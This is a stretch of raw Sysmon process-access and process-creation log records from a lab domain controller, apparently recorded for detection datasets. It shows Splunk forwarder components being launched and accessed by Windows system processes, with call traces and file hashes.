16:09:10.865{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030533Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:10.865{7901BC46-4984-6008-0500-00000000A301}6401168C:\Windows\system32\csrss.exe{7901BC46-55A6-6008-EE06-00000000A301}7900C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030532Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:10.865{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-55A6-6008-EE06-00000000A301}7900C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000030531Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:10.866{7901BC46-55A6-6008-EE06-00000000A301}7900C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000030530Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:10.381{7901BC46-55A6-6008-ED06-00000000A301}77047428C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030529Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:10.240{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-55A6-6008-ED06-00000000A301}7704C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030528Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:10.240{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030527Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:10.240{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030526Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:10.240{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030525Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:10.240{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030524Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:10.240{7901BC46-4984-6008-0500-00000000A301}640656C:\Windows\system32\csrss.exe{7901BC46-55A6-6008-ED06-00000000A301}7704C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030523Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:10.240{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-55A6-6008-ED06-00000000A301}7704C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000030522Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:10.241{7901BC46-55A6-6008-ED06-00000000A301}7704C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000030547Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:11.537{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-55A7-6008-EF06-00000000A301}6416C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030546Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:11.537{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030545Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:11.537{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030544Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:11.537{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030543Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:11.537{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030542Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:11.537{7901BC46-4984-6008-0500-00000000A301}640756C:\Windows\system32\csrss.exe{7901BC46-55A7-6008-EF06-00000000A301}6416C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030541Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:11.537{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-55A7-6008-EF06-00000000A301}6416C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000030540Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:11.538{7901BC46-55A7-6008-EF06-00000000A301}6416C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000030539Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:11.021{7901BC46-55A6-6008-EE06-00000000A301}79005712C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030548Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:23.865{7901BC46-4987-6008-0D00-00000000A301}9961420C:\Windows\system32\svchost.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030575Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:25.880{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030574Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:25.880{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030573Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:25.880{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030572Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:25.880{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030571Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:25.880{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030570Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:25.880{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030569Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 